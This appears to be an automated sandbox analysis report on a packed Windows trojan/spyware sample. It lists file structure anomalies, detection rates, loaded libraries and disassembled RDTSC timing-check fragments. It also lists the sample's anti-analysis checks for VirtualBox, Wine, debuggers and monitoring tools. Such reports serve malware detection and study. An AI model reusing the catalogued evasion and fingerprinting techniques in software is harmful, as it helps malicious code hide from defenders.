Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 0062CBC0 appears 104 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 004571E0 appears 47 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 00495340 appears 50 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 0045CAA0 appears 61 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 00494F40 appears 345 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 00494FD0 appears 289 times
Source: EwhnoHx0n5.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: EwhnoHx0n5.exe | Static PE information: Section: fnsraptz ZLIB complexity 0.9945907876394052
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0045255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_004529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: EwhnoHx0n5.exe | Virustotal: Detection: 58%
Source: EwhnoHx0n5.exe | ReversingLabs: Detection: 57%
Source: EwhnoHx0n5.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: EwhnoHx0n5.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Section loaded: kernel.appcore.dll
Source: EwhnoHx0n5.exe | Static file information: File size 4462592 > 1048576
Source: EwhnoHx0n5.exe | Static PE information: Raw size of (unnamed section) is bigger than: 0x100000 < 0x288a00
Source: EwhnoHx0n5.exe | Static PE information: Raw size of fnsraptz is bigger than: 0x100000 < 0x1b5200

Data Obfuscation

Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Unpacked PE file: 0.2.EwhnoHx0n5.exe.450000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fnsraptz:EW;qkzalnio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fnsraptz:EW;qkzalnio:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: EwhnoHx0n5.exe | Static PE information: real checksum: 0x4426da should be: 0x44eeb2
Source: EwhnoHx0n5.exe | Static PE information: section name: (empty name)
Source: EwhnoHx0n5.exe | Static PE information: section name: .idata
Source: EwhnoHx0n5.exe | Static PE information: section name: (empty name)
Source: EwhnoHx0n5.exe | Static PE information: section name: fnsraptz
Source: EwhnoHx0n5.exe | Static PE information: section name: qkzalnio
Source: EwhnoHx0n5.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_3_01843797 push es; ret | 0_3_018437DB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_3_018419C1 pushad ; retf | 0_3_018419C2
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_3_018436D5 pushad ; ret | 0_3_018436EB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_3_018436ED pushad ; ret | 0_3_018436EB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_3_01840334 push eax; retf | 0_3_01840335
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_3_0184D278 pushad ; iretd | 0_3_0184D279
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe Code function: 0_2_007D41D0 push eax; mov dword ptr [esp], edx 0_2_007D41D5
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe Code function: 0_2_004D2340 push eax; mov dword ptr [esp], 00000000h 0_2_004D2343
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe Code function: 0_2_0050C7F0 push eax; mov dword ptr [esp], 00000000h 0_2_0050C743
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe Code function: 0_2_00490AC0 push eax; mov dword ptr [esp], 00000000h 0_2_00490AC4
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe Code function: 0_2_004B1430 push eax; mov dword ptr [esp], 00000000h 0_2_004B1433
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe Code function: 0_2_004D39A0 push eax; mov dword ptr [esp], 00000000h 0_2_004D39A3
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe Code function: 0_2_004ADAD0 push eax; mov dword ptr [esp], edx 0_2_004ADAD1
Source: EwhnoHx0n5.exe Static PE information: section name: fnsraptz entropy: 7.95651354910041

Boot Survival

Source: C:\Users\user\Desktop\EwhnoHx0n5.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\EwhnoHx0n5.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: C97C17 second address: C97C4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA141FCB1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007FCBA141FCB5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: C97C4A second address: C97C5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: C97C5E second address: C97C68 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCBA141FCACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CA61D3 second address: CA61D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CA61D8 second address: CA61F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FCBA141FCA6h 0x0000000a jmp 00007FCBA141FCB4h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CA6393 second address: CA63A3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA141C926h 0x00000008 jns 00007FCBA141C926h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CA6699 second address: CA66AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141FCB2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CA9E7E second address: CA9E96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CA9E96 second address: CA9E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CA9E9A second address: B31913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 4DB6EEF1h 0x00000011 mov dword ptr [ebp+122D1C14h], esi 0x00000017 push dword ptr [ebp+122D02B5h] 0x0000001d or dword ptr [ebp+122D3806h], eax 0x00000023 call dword ptr [ebp+122D2508h] 0x00000029 pushad 0x0000002a jmp 00007FCBA141C933h 0x0000002f xor eax, eax 0x00000031 cld 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 jmp 00007FCBA141C937h 0x0000003b jns 00007FCBA141C92Bh 0x00000041 mov dword ptr [ebp+122D2930h], eax 0x00000047 add dword ptr [ebp+122D247Eh], esi 0x0000004d mov esi, 0000003Ch 0x00000052 or dword ptr [ebp+122D1BABh], eax 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c sub dword ptr [ebp+122D31A3h], edx 0x00000062 mov dword ptr [ebp+122D1BABh], eax 0x00000068 lodsw 0x0000006a mov dword ptr [ebp+122D23F2h], esi 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 je 00007FCBA141C933h 0x0000007a jmp 00007FCBA141C92Dh 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D31A3h], eax 0x00000089 nop 0x0000008a push edx 0x0000008b push ebx 0x0000008c push eax 0x0000008d push edx 0x0000008e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CA9EE1 second address: CA9F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FCBA141FCB5h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e sub dword ptr [ebp+122D247Eh], eax 0x00000014 push 98972293h 0x00000019 push eax 0x0000001a push edx 0x0000001b jo 00007FCBA141FCACh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CA9F18 second address: CA9F2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141C92Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CAA255 second address: CAA28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FCBA141FCBEh 0x0000000b jmp 00007FCBA141FCB8h 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FCBA141FCAAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CAA28A second address: CAA28E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CAA28E second address: CAA298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CAA298 second address: CAA29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CAA29C second address: CAA2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jc 00007FCBA141FCBBh 0x00000019 jmp 00007FCBA141FCB5h 0x0000001e pop eax 0x0000001f mov esi, 62113684h 0x00000024 lea ebx, dword ptr [ebp+1244BE0Eh] 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jmp 00007FCBA141FCAAh 0x00000033 jne 00007FCBA141FCA6h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CAA2EB second address: CAA2F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CBC3CE second address: CBC3D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CBC3D4 second address: CBC3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: C9B271 second address: C9B275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: C9B275 second address: C9B27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC8415 second address: CC8437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FCBA141FCAFh 0x0000000a pushad 0x0000000b jmp 00007FCBA141FCABh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC871B second address: CC8747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141C930h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCBA141C933h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC8747 second address: CC874B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC874B second address: CC8755 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA141C926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC88B6 second address: CC88BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC88BC second address: CC88D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141C934h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC8DF9 second address: CC8E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC91FD second address: CC9220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FCBA141C939h 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC9220 second address: CC9227 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: C8F43F second address: C8F44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: C8F44D second address: C8F451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC96AD second address: CC96CB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBA141C934h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC96CB second address: CC96E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC9D06 second address: CC9D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141C934h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC9D23 second address: CC9D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC9D27 second address: CC9D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CC9FE0 second address: CC9FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CCA401 second address: CCA41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FCBA141C935h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CCDD61 second address: CCDD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: C91030 second address: C91036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: C91036 second address: C9103A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: C9103A second address: C9103E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CD0F01 second address: CD0F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CD0F07 second address: CD0F59 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCBA141C928h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jp 00007FCBA141C926h 0x00000017 pop ecx 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007FCBA141C92Ch 0x00000022 mov eax, dword ptr [eax] 0x00000024 jmp 00007FCBA141C92Ah 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d pushad 0x0000002e push edx 0x0000002f jmp 00007FCBA141C931h 0x00000034 pop edx 0x00000035 push ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CD1062 second address: CD1088 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA141FCB7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FCBA141FCACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CD1088 second address: CD108C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CD108C second address: CD1096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FCBA141FCA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CD1096 second address: CD109A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CD109A second address: CD10C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d jmp 00007FCBA141FCABh 0x00000012 pop ecx 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 js 00007FCBA141FCACh 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: C9474F second address: C94770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCBA141C937h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CD68E6 second address: CD68EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CD68EA second address: CD6904 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA141C931h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CD9EB7 second address: CD9EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDA563 second address: CDA571 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FCBA141C926h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDAE4C second address: CDAE52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
